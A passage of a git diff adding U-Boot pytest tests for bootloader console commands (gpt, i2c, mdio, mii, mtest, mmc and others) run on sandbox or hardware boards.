ubman.run_command('host bind 0 ' + state_disk_image.path) + parts = ('part2', 'part1') + for bootable in parts: + output = ubman.run_command(f'gpt set-bootable host 0 {bootable}') + assert 'success!' in output + + for p in parts: + output = ubman.run_command(f'gpt setenv host 0 {p}') + assert 'success!' in output + output = ubman.run_command('echo ${gpt_partition_bootable}') + if p == bootable: + assert output.rstrip() == '1' + else: + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_write(state_disk_image, ubman): + """Test the gpt write command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt write host 0 "name=all,size=0"') + assert 'Writing GPT: success!' in output + output = ubman.run_command('part list host 0') + assert '0x00000022 0x00001fde "all"' in output + output = ubman.run_command('gpt write host 0 "uuid_disk=375a56f7-d6c9-4e81-b5f0-09d41ca89efe;name=first,start=1M,size=1M;name=second,start=0x200000,size=0x180000;"') + assert 'Writing GPT: success!' 
in output + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + output = ubman.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_transpose(state_disk_image, ubman): + """Test the gpt transpose command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part list host 0') + assert '1\t0x00000800\t0x00000fff\t"part1"' in output + assert '2\t0x00001000\t0x00001bff\t"part2"' in output + + output = ubman.run_command('gpt transpose host 0 1 2') + assert 'success!' in output + + output = ubman.run_command('part list host 0') + assert '2\t0x00000800\t0x00000fff\t"part1"' in output + assert '1\t0x00001000\t0x00001bff\t"part2"' in output diff --git a/test/py/tests/test_handoff.py b/test/py/tests/test_handoff.py new file mode 100644 index 00000000000..becd7d75cf7 --- /dev/null +++ b/test/py/tests/test_handoff.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest + +# Magic number to check that SPL handoff is working +TEST_HANDOFF_MAGIC = 0x14f93c7b + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl') +def test_handoff(ubman): + """Test that of-platdata can be generated and used in sandbox""" + response = ubman.run_command('sb handoff') + assert ('SPL handoff magic %x' % TEST_HANDOFF_MAGIC) in response diff --git a/test/py/tests/test_help.py b/test/py/tests/test_help.py new file mode 100644 index 00000000000..12cb36b7b98 --- /dev/null +++ b/test/py/tests/test_help.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest + +def test_help(ubman): + """Test that the "help" command can be executed.""" + + lines = ubman.run_command('help') + if ubman.config.buildconfig.get('config_cmd_2048', 'n') == 'y': + assert lines.splitlines()[0] == "2048 - The 2048 game" + else: + assert lines.splitlines()[0] == "? - alias for 'help'" + +@pytest.mark.boardspec('sandbox') +def test_help_no_devicetree(ubman): + try: + ubman.restart_uboot_with_flags([], use_dtb=False) + ubman.run_command('help') + output = ubman.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + ubman.restart_uboot() + +@pytest.mark.boardspec('sandbox_vpl') +def test_vpl_help(ubman): + try: + ubman.restart_uboot() + ubman.run_command('help') + output = ubman.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + ubman.restart_uboot() diff --git a/test/py/tests/test_i2c.py b/test/py/tests/test_i2c.py new file mode 100644 index 00000000000..69b11930ce7 --- /dev/null +++ b/test/py/tests/test_i2c.py @@ -0,0 +1,116 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the i2c device info including the bus list and eeprom address/value. This test +will be automatically skipped without this. 
+ +For example: + +# Setup env__i2c_device_test to set the i2c bus list and probe_all boolean +# parameter. For i2c_probe_all_buses case, if probe_all parameter is set to +# False then it probes all the buses listed in bus_list instead of probing all +# the buses available. +env__i2c_device_test = { + 'bus_list': [0, 2, 5, 12, 16, 18], + 'probe_all': False, +} + +# Setup env__i2c_eeprom_device_test to set the i2c bus number, eeprom address +# and configured value for i2c_eeprom test case. Test will be skipped if +# env__i2c_eeprom_device_test is not set +env__i2c_eeprom_device_test = { + 'bus': 3, + 'eeprom_addr': 0x54, + 'eeprom_val': '30 31', +} +""" + +def get_i2c_test_env(ubman): + f = ubman.config.env.get("env__i2c_device_test", None) + if not f: + pytest.skip("No I2C device to test!") + else: + bus_list = f.get("bus_list", None) + if not bus_list: + pytest.skip("I2C bus list is not provided!") + probe_all = f.get("probe_all", False) + return bus_list, probe_all + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_bus(ubman): + bus_list, probe = get_i2c_test_env(ubman) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = ubman.run_command("i2c bus") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_dev(ubman): + bus_list, probe = get_i2c_test_env(ubman) + expected_response = "Current bus is" + response = ubman.run_command("i2c dev") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe(ubman): + bus_list, probe = get_i2c_test_env(ubman) + bus = random.choice(bus_list) + expected_response = f"Setting bus to {bus}" + response = ubman.run_command(f"i2c dev {bus}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = ubman.run_command("i2c probe") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_eeprom(ubman): + f = ubman.config.env.get("env__i2c_eeprom_device_test", None) + if not f: + pytest.skip("No I2C eeprom to test!") + + bus = f.get("bus", 0) + if bus < 0: + pytest.fail("No bus specified via env__i2c_eeprom_device_test!") + + addr = f.get("eeprom_addr", -1) + if addr < 0: + pytest.fail("No eeprom address specified via env__i2c_eeprom_device_test!") + + value = f.get("eeprom_val") + if not value: + pytest.fail( + "No eeprom configured value provided via env__i2c_eeprom_device_test!" 
+ ) + + # Enable i2c mux bridge + ubman.run_command("i2c dev %x" % bus) + ubman.run_command("i2c probe") + output = ubman.run_command("i2c md %x 0 5" % addr) + assert value in output + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe_all_buses(ubman): + bus_list, probe = get_i2c_test_env(ubman) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = ubman.run_command("i2c bus") + assert expected_response in response + + # Get all the bus list + if probe: + buses = re.findall("Bus (.+?):", response) + bus_list = [int(x) for x in buses] + + for dev in bus_list: + expected_response = f"Setting bus to {dev}" + response = ubman.run_command(f"i2c dev {dev}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = ubman.run_command("i2c probe") + assert expected_response in response diff --git a/test/py/tests/test_kconfig.py b/test/py/tests/test_kconfig.py new file mode 100644 index 00000000000..0c261d47975 --- /dev/null +++ b/test/py/tests/test_kconfig.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import utils + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_kconfig' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_kconfig(ubman): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + + # This detects build errors in test/lib/kconfig.c + out = utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' in out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +def test_kconfig_spl(ubman): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + + # This detects build errors in test/lib/kconfig_spl.c + out = utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', 'sandbox_spl', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + + # There is no CONFIG_SPL_TEST_KCONFIG, so the CONFIG_IF_ENABLED_INT() + # line should not generate an error + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' not in out diff --git a/test/py/tests/test_log.py b/test/py/tests/test_log.py new file mode 100644 index 00000000000..4558b037e2a --- /dev/null +++ b/test/py/tests/test_log.py @@ -0,0 +1,49 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. +# +# U-Boot Verified Boot Test + +""" +This tests U-Boot logging. It uses the 'log test' command with various options +and checks that the output is correct. 
+""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_log') +def test_log_format(ubman): + """Test the 'log format' and 'log rec' commands""" + def run_with_format(fmt, expected_output): + """Set up the log format and then write a log record + + Args: + fmt: Format to use for 'log format' + expected_output: Expected output from the 'log rec' command + """ + output = ubman.run_command('log format %s' % fmt) + assert output == '' + output = ubman.run_command('log rec arch notice file.c 123 func msg') + assert output == expected_output + + with ubman.log.section('format'): + pad = int(ubman.config.buildconfig.get('config_logf_func_pad')) + padding = ' ' * (pad - len('func')) + + run_with_format('all', f'NOTICE.arch,file.c:123-{padding}func() msg') + output = ubman.run_command('log format') + assert output == 'Log format: clFLfm' + + run_with_format('fm', f'{padding}func() msg') + run_with_format('clfm', f'NOTICE.arch,{padding}func() msg') + run_with_format('FLfm', f'file.c:123-{padding}func() msg') + run_with_format('lm', 'NOTICE. msg') + run_with_format('m', 'msg') + +@pytest.mark.buildconfigspec('debug_uart') +@pytest.mark.boardspec('sandbox') +def test_log_dropped(ubman): + """Test dropped 'log' message when debug_uart is activated""" + + ubman.restart_uboot() + output = ubman.get_spawn_output().replace('\r', '') + assert (not 'debug: main' in output) diff --git a/test/py/tests/test_lsblk.py b/test/py/tests/test_lsblk.py new file mode 100644 index 00000000000..babd4f9528b --- /dev/null +++ b/test/py/tests/test_lsblk.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('blk') +@pytest.mark.buildconfigspec('cmd_lsblk') +def test_lsblk(ubman): + """Test that `lsblk` prints a result which includes `host`.""" + output = ubman.run_command('lsblk') + assert "Block Driver" in output + assert "sandbox_host_blk" in output diff --git a/test/py/tests/test_md.py b/test/py/tests/test_md.py new file mode 100644 index 00000000000..5c7bcbd420b --- /dev/null +++ b/test/py/tests/test_md.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. 
+ +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md(ubman): + """Test that md reads memory as expected, and that memory can be modified + using the mw command.""" + + ram_base = utils.find_ram_base(ubman) + addr = '%08x' % ram_base + val = 'a5f09876' + expected_response = addr + ': ' + val + ubman.run_command('mw ' + addr + ' 0 10') + response = ubman.run_command('md ' + addr + ' 10') + assert(not (expected_response in response)) + ubman.run_command('mw ' + addr + ' ' + val) + response = ubman.run_command('md ' + addr + ' 10') + assert(expected_response in response) + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md_repeat(ubman): + """Test command repeat (via executing an empty command) operates correctly + for "md"; the command must repeat and dump an incrementing address.""" + + ram_base = utils.find_ram_base(ubman) + addr_base = '%08x' % ram_base + words = 0x10 + addr_repeat = '%08x' % (ram_base + (words * 4)) + ubman.run_command('md %s %x' % (addr_base, words)) + response = ubman.run_command('') + expected_response = addr_repeat + ': ' + assert(expected_response in response) diff --git a/test/py/tests/test_mdio.py b/test/py/tests/test_mdio.py new file mode 100644 index 00000000000..5345f1f4c40 --- /dev/null +++ b/test/py/tests/test_mdio.py @@ -0,0 +1,79 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the PHY device info including the device name, address, register address/value +and write data value. This test will be automatically skipped without this. + +For example: + +# Setup env__mdio_util_test to set the PHY address, device names, register +# address, register address value, and write data value to test mdio commands. 
+# Test will be skipped if env_mdio_util_test is not set +env__mdio_util_test = { + "eth0": {"phy_addr": 0xc, "device_name": "TI DP83867", "reg": 0, + "reg_val": 0x1000, "write_val": 0x100}, + "eth1": {"phy_addr": 0xa0, "device_name": "TI DP83867", "reg": 1, + "reg_val": 0x2000, "write_val": 0x100}, +} +""" + +def get_mdio_test_env(ubman): + f = ubman.config.env.get("env__mdio_util_test", None) + if not f or len(f) == 0: + pytest.skip("No PHY device to test!") + else: + return f + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_list(ubman): + f = get_mdio_test_env(ubman) + output = ubman.run_command("mdio list") + for dev, val in f.items(): + phy_addr = val.get("phy_addr") + dev_name = val.get("device_name") + + assert f"{phy_addr:x} -" in output + assert dev_name in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_read(ubman): + f = get_mdio_test_env(ubman) + output = ubman.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + + output = ubman.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_write(ubman): + f = get_mdio_test_env(ubman) + output = ubman.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + wr_val = hex(val.get("write_val")) + + ubman.run_command(f"mdio write {phy_addr} {reg} {wr_val}") + output = ubman.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {wr_val}" in output + + ubman.run_command(f"mdio write {phy_addr} {reg} {reg_val}") + output = ubman.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output diff --git a/test/py/tests/test_memtest.py b/test/py/tests/test_memtest.py new file mode 100644 index 00000000000..0340edbea5a --- /dev/null +++ b/test/py/tests/test_memtest.py @@ -0,0 +1,68 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the memory test parameters such as start address, memory size, pattern, +iterations and timeout. This test will be automatically skipped without this. + +For example: + +# Setup env__memtest to set the start address of the memory range, size of the +# memory range to test from starting address, pattern to be written to memory, +# number of test iterations, and expected time to complete the test of mtest +# command. start address, size, and pattern parameters value should be in hex +# and rest of the params value should be integer. 
+env__memtest = { + 'start_addr': 0x0, + 'size': 0x1000, + 'pattern': 0x0, + 'iteration': 16, + 'timeout': 50000, +} +""" + +def get_memtest_env(ubman): + f = ubman.config.env.get("env__memtest", None) + if not f: + pytest.skip("memtest is not enabled!") + else: + start = f.get("start_addr", 0x0) + size = f.get("size", 0x1000) + pattern = f.get("pattern", 0x0) + iteration = f.get("iteration", 2) + timeout = f.get("timeout", 50000) + end = hex(int(start) + int(size)) + return start, end, pattern, iteration, timeout + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_negative(ubman): + """Negative testcase where end address is smaller than starting address and + pattern is invalid.""" + start, end, pattern, iteration, timeout = get_memtest_env(ubman) + expected_response = "Refusing to do empty test" + response = ubman.run_command( + f"mtest 2000 1000 {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = ubman.run_command("echo $?") + assert not output.endswith("0") + ubman.run_command(f"mtest {start} {end} 'xyz' {hex(iteration)}") + output = ubman.run_command("echo $?") + assert not output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_ddr(ubman): + """Test that md reads memory as expected, and that memory can be modified + using the mw command.""" + start, end, pattern, iteration, timeout = get_memtest_env(ubman) + expected_response = f"Tested {str(iteration)} iteration(s) with 0 errors." + with ubman.temporary_timeout(timeout): + response = ubman.run_command( + f"mtest {start} {end} {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = ubman.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mii.py b/test/py/tests/test_mii.py new file mode 100644 index 00000000000..e282add5ee8 --- /dev/null +++ b/test/py/tests/test_mii.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__mii_deive_test_skip to True if tests with ethernet PHY devices +# should be skipped. For example: Missing PHY device +env__mii_device_test_skip = True + +# Setup env__mii_device_test to set the MII device names. 
Test will be skipped +# if env_mii_device_test is not set +env__mii_device_test = { + 'device_list': ['eth0', 'eth1'], +} +""" + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_info(ubman): + if ubman.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + expected_output = "PHY" + output = ubman.run_command("mii info") + if not re.search(r"PHY (.+?):", output): + pytest.skip("PHY device does not exist!") + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_list(ubman): + if ubman.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + + f = ubman.config.env.get("env__mii_device_test", None) + if not f: + pytest.skip("No MII device to test!") + + dev_list = f.get("device_list") + if not dev_list: + pytest.fail("No MII device list provided via env__mii_device_test!") + + expected_output = "Current device" + output = ubman.run_command("mii device") + mii_devices = ( + re.search(r"MII devices: '(.+)'", output).groups()[0].replace("'", "").split() + ) + + assert len([x for x in dev_list if x in mii_devices]) == len(dev_list) + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_set_device(ubman): + test_mii_list(ubman) + f = ubman.config.env.get("env__mii_device_test", None) + dev_list = f.get("device_list") + output = ubman.run_command("mii device") + current_dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + + for dev in dev_list: + ubman.run_command(f"mii device {dev}") + output = ubman.run_command("echo $?") + assert output.endswith("0") + + ubman.run_command(f"mii device {current_dev}") + output = ubman.run_command("mii device") + dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + assert current_dev == dev + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_read(ubman): + test_mii_list(ubman) + output = ubman.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + ubman.run_command(f"mii read {eth_addr} 0") + output = ubman.run_command("echo $?") + assert output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_dump(ubman): + test_mii_list(ubman) + expected_response = "PHY control register" + output = ubman.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + response = ubman.run_command(f"mii dump {eth_addr} 0") + assert expected_response in response + output = ubman.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mmc.py b/test/py/tests/test_mmc.py new file mode 100644 index 00000000000..e751a3bd36a --- /dev/null +++ b/test/py/tests/test_mmc.py @@ -0,0 +1,740 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test MMC file system cases (fat32, ext2, ext4), +MMC device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the MMC device is not detected. + +For example: + +# Setup env__mmc_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for MMC device. 
+env__mmc_device_test_skip = False + +# Setup env__mmc_device to set the supported mmc modes to be tested +env__mmc_device { + 'mmc_modes': ['MMC_LEGACY', 'SD_HS'], +} + +""" + +mmc_set_up = False +controllers = 0 +devices = {} +mmc_modes_name = [] +mmc_modes = [] + +def setup_mmc_modes(ubman): + global mmc_modes, mmc_modes_name + f = ubman.config.env.get('env__mmc_device', None) + if f: + mmc_modes_name = f.get('mmc_modes', None) + + # Set mmc mode to default mode (legacy), if speed mode config isn't enabled + if ubman.config.buildconfig.get('config_mmc_speed_mode_set', 'n') != 'y': + mmc_modes = [0] + return + + if mmc_modes_name: + mmc_help = ubman.run_command('mmc -help') + m = re.search(r"\[MMC_LEGACY(.*\n.+])", mmc_help) + modes = [ + x.strip() + for x in m.group() + .replace('\n', '') + .replace('[', '') + .replace(']', '') + .split(',') + ] + + for mode in mmc_modes_name: + mmc_modes += [modes.index(mode)] + else: + # Set mmc mode to default mode (legacy), if it is not defined in env + mmc_modes = [0] + +def setup_mmc(ubman): + if ubman.config.env.get('env__mmc_device_test_skip', True): + pytest.skip('MMC device test is not enabled') + + setup_mmc_modes(ubman) + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_list(ubman): + setup_mmc(ubman) + output = ubman.run_command('mmc list') + if 'No MMC device available' in output: + pytest.skip('No SD/MMC/eMMC controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No SD/MMC card present') + + array = output.split() + global devices + global controllers + controllers = int(len(array) / 2) + for x in range(0, controllers): + y = x * 2 + devices[x] = {} + devices[x]['name'] = array[y] + + global mmc_set_up + mmc_set_up = True + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + fail = 0 + for x in range(0, controllers): + devices[x]['detected'] = 'yes' + + for y in mmc_modes: + output = ubman.run_command('mmc dev %d 0 %d' % x, y) + + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'no mmc device at slot' in output: + devices[x]['detected'] = 'no' + + if 'MMC: no card present' in output: + devices[x]['detected'] = 'no' + + if fail: + pytest.fail('Card not present') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmcinfo(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for y in mmc_modes: + ubman.run_command('mmc dev %d 0 %d' % x, y) + output = ubman.run_command('mmcinfo') + if 'busy timeout' in output: + pytest.skip('No SD/MMC/eMMC device present') + + assert mmc_modes_name[mmc_modes.index(y)] in output + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = float(obj.groups()[0]) + print(capacity) + devices[x]['capacity'] = capacity + print('Capacity of dev %d is: %g GiB' % (x, capacity)) + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for y in mmc_modes: + ubman.run_command('mmc dev %d 0 %d' % x, y) + + output = ubman.run_command('mmc info') + assert mmc_modes_name[mmc_modes.index(y)] in output + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = 
float(obj.groups()[0]) + print(capacity) + if devices[x]['capacity'] != capacity: + pytest.fail("MMC capacity doesn't match mmcinfo") + + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + for y in mmc_modes: + ubman.run_command('mmc dev %d 0 %d' % x, y) + output = ubman.run_command('mmc rescan') + if output: + pytest.fail('mmc rescan has something to check') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_part(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + ubman.run_command('mmc dev %d' % x) + output = ubman.run_command('mmc part') + + lines = output.split('\n') + part_fat = [] + part_ext2 = [] + part_ext4 = [] + for line in lines: + obj = re.search( + r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type in ['0c', '0b', '0e']: + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext(2/4) detected') + output = ubman.run_command( + 'fstype mmc %d:%d' % x, part_id + ) + if 'ext2' in output: + part_ext2.append(part_id) + elif 'ext4' in output: + part_ext4.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % x) + devices[x]['ext4'] = part_ext4 + devices[x]['ext2'] = part_ext2 + devices[x]['fat'] = part_fat + + if not part_ext2 and not part_ext4 and not part_fat: + pytest.fail('No partition detected on device %d' % x) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +def test_mmc_fatls_fatinfo(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + for y in mmc_modes: + ubman.run_command('mmc dev %d %d %d' % x, part, y) + output = ubman.run_command( + 'fatls mmc %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper, x)) + output = ubman.run_command( + 'fatinfo mmc %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper + if re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_fatload_fatwrite(ubman): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + 
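+ # Use the FAT partition list recorded earlier by test_mmc_part; skip this controller if none was found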
+@pytest.mark.buildconfigspec('cmd_mmc')
+@pytest.mark.buildconfigspec('cmd_fat')
+@pytest.mark.buildconfigspec('cmd_memory')
+def test_mmc_fatload_fatwrite(ubman):
+    if not mmc_set_up:
+        pytest.skip('No SD/MMC/eMMC controller available')
+
+    if not devices:
+        pytest.skip('No devices detected')
+
+    part_detect = 0
+    fs = 'fat'
+    for x in range(0, controllers):
+        if devices[x]['detected'] == 'yes':
+            try:
+                partitions = devices[x][fs]
+            except:
+                print('No %s table on this device' % fs.upper())
+                continue
+
+            for part in partitions:
+                for y in mmc_modes:
+                    ubman.run_command('mmc dev %d %d %d' % (x, part, y))
+                    part_detect = 1
+                    addr = utils.find_ram_base(ubman)
+                    devices[x]['addr_%d' % part] = addr
+                    size = random.randint(4, 1 * 1024 * 1024)
+                    devices[x]['size_%d' % part] = size
+                    # count CRC32
+                    output = ubman.run_command('crc32 %x %x' % (addr, size))
+                    m = re.search(r'==> (.+?)$', output)
+                    if not m:
+                        pytest.fail('CRC32 failed')
+                    expected_crc32 = m.group(1)
+                    devices[x]['expected_crc32_%d' % part] = expected_crc32
+                    # do write
+                    file = '%s_%d' % ('uboot_test', size)
+                    devices[x]['file_%d' % part] = file
+                    output = ubman.run_command(
+                        '%swrite mmc %d:%s %x %s %x' % (fs, x, part, addr, file, size)
+                    )
+                    assert 'Unable to write' not in output
+                    assert 'Error' not in output
+                    assert 'overflow' not in output
+                    expected_text = '%d bytes written' % size
+                    assert expected_text in output
+
+                    alignment = int(
+                        ubman.config.buildconfig.get(
+                            'config_sys_cacheline_size', 128
+                        )
+                    )
+                    offset = random.randrange(alignment, 1024, alignment)
+                    output = ubman.run_command(
+                        '%sload mmc %d:%s %x %s' % (fs, x, part, addr + offset, file)
+                    )
+                    assert 'Invalid FAT entry' not in output
+                    assert 'Unable to read file' not in output
+                    assert 'Misaligned buffer address' not in output
+                    expected_text = '%d bytes read' % size
+                    assert expected_text in output
+
+                    output = ubman.run_command(
+                        'crc32 %x $filesize' % (addr + offset)
+                    )
+                    assert expected_crc32 in output
+
+    if not part_detect:
+        pytest.skip('No %s partition detected' % fs.upper())
+
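(Editor's note, not part of the patch.) The read-back address in test_mmc_fatload_fatwrite above is deliberately shifted by a random, non-zero multiple of the configured cache-line size, so fatload is exercised with aligned buffer addresses that differ from the write address. A small illustration of how such an offset is drawn, assuming the same default of 128 bytes when config_sys_cacheline_size is absent:

    import random

    def pick_read_offset(buildconfig):
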